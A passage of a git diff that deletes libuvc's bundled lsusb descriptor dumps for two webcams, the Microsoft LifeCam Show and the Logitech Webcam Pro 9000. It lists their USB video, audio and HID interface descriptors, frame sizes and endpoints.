-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         2
-        wTotalLength                      587
-        bEndPointAddress                  130
-        bmInfo                              0
-        bTerminalLink                       3
-        bStillCaptureMethod                 2
-        bTriggerSupport                     1
-        bTriggerUsage                       1
-        bControlSize                        1
-        bmaControls( 0)                    27
-        bmaControls( 1)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors                6
-        guidFormat                            {59555932-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns               6
-        wWidth( 0)                        352
-        wHeight( 0)                       288
-        wWidth( 1)                        640
-        wHeight( 1)                       480
-        wWidth( 2)                        320
-        wHeight( 2)                       240
-        wWidth( 3)                        176
-        wHeight( 3)                       144
-        wWidth( 4)                        160
-        wHeight( 4)                       120
-        wWidth( 5)                        800
-        wHeight( 5)                       600
-        bNumCompressionPatterns             6
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     0 (Unspecified)
-        bTransferCharacteristics            0 (Unspecified)
-        bMatrixCoefficients                 0 (Unspecified)
-      VideoStreaming Interface Descriptor:
-        bLength                            11
-        bDescriptorType                    36
-        bDescriptorSubtype                  6 (FORMAT_MJPEG)
-        bFormatIndex                        2
-        bNumFrameDescriptors                9
-        bFlags                              1
-          Fixed-size samples: Yes
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         6
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            800
-        wHeight                           600
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval         666667
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)            666667
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         7
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1024
-        wHeight                           768
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           1333333
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         8
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1280
-        wHeight                           960
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           1333333
-      VideoStreaming Interface Descriptor:
-        bLength                            30
-        bDescriptorType                    36
-        bDescriptorSubtype                  7 (FRAME_MJPEG)
-        bFrameIndex                         9
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                           1600
-        wHeight                          1200
-        dwMinBitRate                196608000
-        dwMaxBitRate                196608000
-        dwMaxVideoFrameBufferSize     3840000
-        dwDefaultFrameInterval        1333333
-        bFrameIntervalType                  1
-        dwFrameInterval( 0)           1333333
-      VideoStreaming Interface Descriptor:
-        bLength                            42
-        bDescriptorType                    36
-        bDescriptorSubtype                  3 (STILL_IMAGE_FRAME)
-        bEndpointAddress                    0
-        bNumImageSizePatterns               9
-        wWidth( 0)                        352
-        wHeight( 0)                       288
-        wWidth( 1)                        640
-        wHeight( 1)                       480
-        wWidth( 2)                        320
-        wHeight( 2)                       240
-        wWidth( 3)                        176
-        wHeight( 3)                       144
-        wWidth( 4)                        160
-        wHeight( 4)                       120
-        wWidth( 5)                        800
-        wHeight( 5)                       600
-        wWidth( 6)                       1024
-        wHeight( 6)                       768
-        wWidth( 7)                       1280
-        wHeight( 7)                       960
-        wWidth( 8)                       1600
-        wHeight( 8)                      1200
-        bNumCompressionPatterns             9
-      VideoStreaming Interface Descriptor:
-        bLength                             6
-        bDescriptorType                    36
-        bDescriptorSubtype                 13 (COLORFORMAT)
-        bColorPrimaries                     0 (Unspecified)
-        bTransferCharacteristics            0 (Unspecified)
-        bMatrixCoefficients                 0 (Unspecified)
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0080  1x 128 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       2
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0200  1x 512 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       3
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0400  1x 1024 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       4
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0b00  2x 768 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       5
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x0c00  2x 1024 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       6
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1380  3x 896 bytes
-        bInterval               1
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       7
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x82  EP 2 IN
-        bmAttributes            5
-          Transfer Type            Isochronous
-          Synch Type               Asynchronous
-          Usage Type               Data
-        wMaxPacketSize     0x1400  3x 1024 bytes
-        bInterval               1
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         2
-      bInterfaceCount         2
-      bFunctionClass          1 Audio
-      bFunctionSubClass       2 Streaming
-      bFunctionProtocol       0 
-      iFunction               2 Microsoft® LifeCam Show(TM)
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        2
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      1 Control Device
-      bInterfaceProtocol      0 
-      iInterface              2 Microsoft® LifeCam Show(TM)
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdADC               1.00
-        wTotalLength           39
-        bInCollection           1
-        baInterfaceNr( 0)       3
-      AudioControl Interface Descriptor:
-        bLength                12
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Microphone
-        bAssocTerminal          0
-        bNrChannels             1
-        wChannelConfig     0x0000
-        iChannelNames           0 
-        iTerminal               0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      6 (FEATURE_UNIT)
-        bUnitID                 2
-        bSourceID               1
-        bControlSize            1
-        bmaControls( 0)      0x00
-        bmaControls( 1)      0x03
-          Mute
-          Volume
-        iFeature                0 
-      AudioControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             3
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          1
-        bSourceID               2
-        iTerminal               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        3
-      bAlternateSetting       1
-      bNumEndpoints           1
-      bInterfaceClass         1 Audio
-      bInterfaceSubClass      2 Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      AudioStreaming Interface Descriptor:
-        bLength                 7
-        bDescriptorType        36
-        bDescriptorSubtype      1 (AS_GENERAL)
-        bTerminalLink           3
-        bDelay                  1 frames
-        wFormatTag              1 PCM
-      AudioStreaming Interface Descriptor:
-        bLength                14
-        bDescriptorType        36
-        bDescriptorSubtype      2 (FORMAT_TYPE)
-        bFormatType             1 (FORMAT_TYPE_I)
-        bNrChannels             1
-        bSubframeSize           2
-        bBitResolution         16
-        bSamFreqType            2 Discrete
-        tSamFreq[ 0]        44100
-        tSamFreq[ 1]        48000
-      Endpoint Descriptor:
-        bLength                 9
-        bDescriptorType         5
-        bEndpointAddress     0x83  EP 3 IN
-        bmAttributes            1
-          Transfer Type            Isochronous
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0062  1x 98 bytes
-        bInterval               4
-        bRefresh                0
-        bSynchAddress           0
-        AudioControl Endpoint Descriptor:
-          bLength                 7
-          bDescriptorType        37
-          bDescriptorSubtype      1 (EP_GENERAL)
-          bmAttributes         0x01
-            Sampling Frequency
-          bLockDelayUnits         0 Undefined
-          wLockDelay              0 Undefined
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        4
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass         3 Human Interface Device
-      bInterfaceSubClass      1 Boot Interface Subclass
-      bInterfaceProtocol      1 Keyboard
-      iInterface              0 
-        HID Device Descriptor:
-          bLength                 9
-          bDescriptorType        33
-          bcdHID               1.10
-          bCountryCode            0 Not supported
-          bNumDescriptors         1
-          bDescriptorType        34 Report
-          wDescriptorLength      24
-         Report Descriptors: 
-           ** UNAVAILABLE **
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x85  EP 5 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0001  1x 1 bytes
-        bInterval              10
-Device Qualifier (for other device speed):
-  bLength                10
-  bDescriptorType         6
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  bNumConfigurations      1
-Device Status:     0x0000
-  (Bus Powered)
diff --git a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000.txt b/thirdparty/libuvc-0.0.6/cameras/quickcampro9000.txt
deleted file mode 100644
index 5b859b3..0000000
--- a/thirdparty/libuvc-0.0.6/cameras/quickcampro9000.txt
+++ /dev/null
@@ -1,1543 +0,0 @@
-
-Bus 001 Device 009: ID 046d:0809 Logitech, Inc. Webcam Pro 9000
-Device Descriptor:
-  bLength                18
-  bDescriptorType         1
-  bcdUSB               2.00
-  bDeviceClass          239 Miscellaneous Device
-  bDeviceSubClass         2 ?
-  bDeviceProtocol         1 Interface Association
-  bMaxPacketSize0        64
-  idVendor           0x046d Logitech, Inc.
-  idProduct          0x0809 Webcam Pro 9000
-  bcdDevice            0.10
-  iManufacturer           0 
-  iProduct                0 
-  iSerial                 2 XXXXXXXX
-  bNumConfigurations      1
-  Configuration Descriptor:
-    bLength                 9
-    bDescriptorType         2
-    wTotalLength         2589
-    bNumInterfaces          4
-    bConfigurationValue     1
-    iConfiguration          0 
-    bmAttributes         0x80
-      (Bus Powered)
-    MaxPower              500mA
-    Interface Association:
-      bLength                 8
-      bDescriptorType        11
-      bFirstInterface         0
-      bInterfaceCount         2
-      bFunctionClass         14 Video
-      bFunctionSubClass       3 Video Interface Collection
-      bFunctionProtocol       0 
-      iFunction               0 
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        0
-      bAlternateSetting       0
-      bNumEndpoints           1
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      1 Video Control
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoControl Interface Descriptor:
-        bLength                13
-        bDescriptorType        36
-        bDescriptorSubtype      1 (HEADER)
-        bcdUVC               1.00
-        wTotalLength          245
-        dwClockFrequency       48.000000MHz
-        bInCollection           1
-        baInterfaceNr( 0)       1
-      VideoControl Interface Descriptor:
-        bLength                18
-        bDescriptorType        36
-        bDescriptorSubtype      2 (INPUT_TERMINAL)
-        bTerminalID             1
-        wTerminalType      0x0201 Camera Sensor
-        bAssocTerminal          0
-        iTerminal               0 
-        wObjectiveFocalLengthMin      0
-        wObjectiveFocalLengthMax      0
-        wOcularFocalLength            0
-        bControlSize                  3
-        bmControls           0x0000080e
-          Auto-Exposure Mode
-          Auto-Exposure Priority
-          Exposure Time (Absolute)
-          PanTilt (Absolute)
-      VideoControl Interface Descriptor:
-        bLength                11
-        bDescriptorType        36
-        bDescriptorSubtype      5 (PROCESSING_UNIT)
-      Warning: Descriptor too short
-        bUnitID                 2
-        bSourceID               1
-        wMaxMultiplier      16384
-        bControlSize            2
-        bmControls     0x0000175b
-          Brightness
-          Contrast
-          Saturation
-          Sharpness
-          White Balance Temperature
-          Backlight Compensation
-          Gain
-          Power Line Frequency
-          White Balance Temperature, Auto
-        iProcessing             0 
-        bmVideoStandards     0x1b
-          None
-          NTSC - 525/60
-          SECAM - 625/50
-          NTSC - 625/50
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 4
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d221e}
-        bNumControl            10
-        bNrPins                 1
-        baSourceID( 0)          2
-        bControlSize            2
-        bmControls( 0)       0xff
-        bmControls( 1)       0x03
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                27
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                13
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d221f}
-        bNumControl             7
-        bNrPins                 1
-        baSourceID( 0)          2
-        bControlSize            2
-        bmControls( 0)       0x6f
-        bmControls( 1)       0x01
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 8
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2251}
-        bNumControl             3
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0x19
-        bmControls( 1)       0x00
-        bmControls( 2)       0x00
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                10
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2252}
-        bNumControl            24
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0xff
-        bmControls( 1)       0xff
-        bmControls( 2)       0xff
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                14
-        guidExtensionCode         {b7935ba4-15c7-0245-90f4-532a3b311365}
-        bNumControl             4
-        bNrPins                 1
-        baSourceID( 0)          1
-        bControlSize            3
-        bmControls( 0)       0x0f
-        bmControls( 1)       0x00
-        bmControls( 2)       0x00
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                 9
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2256}
-        bNumControl             5
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0x0c
-        bmControls( 1)       0x00
-        bmControls( 2)       0x00
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                28
-        bDescriptorType        36
-        bDescriptorSubtype      6 (EXTENSION_UNIT)
-        bUnitID                12
-        guidExtensionCode         {82066163-7050-ab49-b8cc-b3855e8d2250}
-        bNumControl            17
-        bNrPins                 1
-        baSourceID( 0)          4
-        bControlSize            3
-        bmControls( 0)       0xfe
-        bmControls( 1)       0x7f
-        bmControls( 2)       0x70
-        iExtension              0 
-      VideoControl Interface Descriptor:
-        bLength                 9
-        bDescriptorType        36
-        bDescriptorSubtype      3 (OUTPUT_TERMINAL)
-        bTerminalID             5
-        wTerminalType      0x0101 USB Streaming
-        bAssocTerminal          0
-        bSourceID               4
-        iTerminal               0 
-      ** UNRECOGNIZED:  20 41 01 0b 82 06 61 63 70 50 ab 49 b8 cc b3 85 5e 8d 22 55 01 01 04 03 01 00 00 00 00 00 00 00
-      Endpoint Descriptor:
-        bLength                 7
-        bDescriptorType         5
-        bEndpointAddress     0x87  EP 7 IN
-        bmAttributes            3
-          Transfer Type            Interrupt
-          Synch Type               None
-          Usage Type               Data
-        wMaxPacketSize     0x0010  1x 16 bytes
-        bInterval               8
-    Interface Descriptor:
-      bLength                 9
-      bDescriptorType         4
-      bInterfaceNumber        1
-      bAlternateSetting       0
-      bNumEndpoints           0
-      bInterfaceClass        14 Video
-      bInterfaceSubClass      2 Video Streaming
-      bInterfaceProtocol      0 
-      iInterface              0 
-      VideoStreaming Interface Descriptor:
-        bLength                            16
-        bDescriptorType                    36
-        bDescriptorSubtype                  1 (INPUT_HEADER)
-        bNumFormats                         3
-        wTotalLength                     1852
-        bEndPointAddress                  129
-        bmInfo                              0
-        bTerminalLink                       5
-        bStillCaptureMethod                 2
-        bTriggerSupport                     1
-        bTriggerUsage                       0
-        bControlSize                        1
-        bmaControls( 0)                    27
-        bmaControls( 1)                    27
-        bmaControls( 2)                    27
-      VideoStreaming Interface Descriptor:
-        bLength                            27
-        bDescriptorType                    36
-        bDescriptorSubtype                  4 (FORMAT_UNCOMPRESSED)
-        bFormatIndex                        1
-        bNumFrameDescriptors               18
-        guidFormat                            {59555932-0000-1000-8000-00aa00389b71}
-        bBitsPerPixel                      16
-        bDefaultFrameIndex                  1
-        bAspectRatioX                       0
-        bAspectRatioY                       0
-        bmInterlaceFlags                 0x00
-          Interlaced stream or variable: No
-          Fields per frame: 1 fields
-          Field 1 first: No
-          Field pattern: Field 1 only
-          bCopyProtect                      0
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         1
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            640
-        wHeight                           480
-        dwMinBitRate                 24576000
-        dwMaxBitRate                147456000
-        dwMaxVideoFrameBufferSize      614400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         2
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            160
-        wHeight                           120
-        dwMinBitRate                  1536000
-        dwMaxBitRate                  9216000
-        dwMaxVideoFrameBufferSize       38400
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         3
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            176
-        wHeight                           144
-        dwMinBitRate                  2027520
-        dwMaxBitRate                 12165120
-        dwMaxVideoFrameBufferSize       50688
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         4
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            320
-        wHeight                           240
-        dwMinBitRate                  6144000
-        dwMaxBitRate                 36864000
-        dwMaxVideoFrameBufferSize      153600
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
-        dwFrameInterval( 3)            666666
-        dwFrameInterval( 4)           1000000
-        dwFrameInterval( 5)           2000000
-      VideoStreaming Interface Descriptor:
-        bLength                            50
-        bDescriptorType                    36
-        bDescriptorSubtype                  5 (FRAME_UNCOMPRESSED)
-        bFrameIndex                         5
-        bmCapabilities                   0x00
-          Still image unsupported
-        wWidth                            352
-        wHeight                           288
-        dwMinBitRate                  8110080
-        dwMaxBitRate                 48660480
-        dwMaxVideoFrameBufferSize      202752
-        dwDefaultFrameInterval         333333
-        bFrameIntervalType                  6
-        dwFrameInterval( 0)            333333
-        dwFrameInterval( 1)            400000
-        dwFrameInterval( 2)            500000
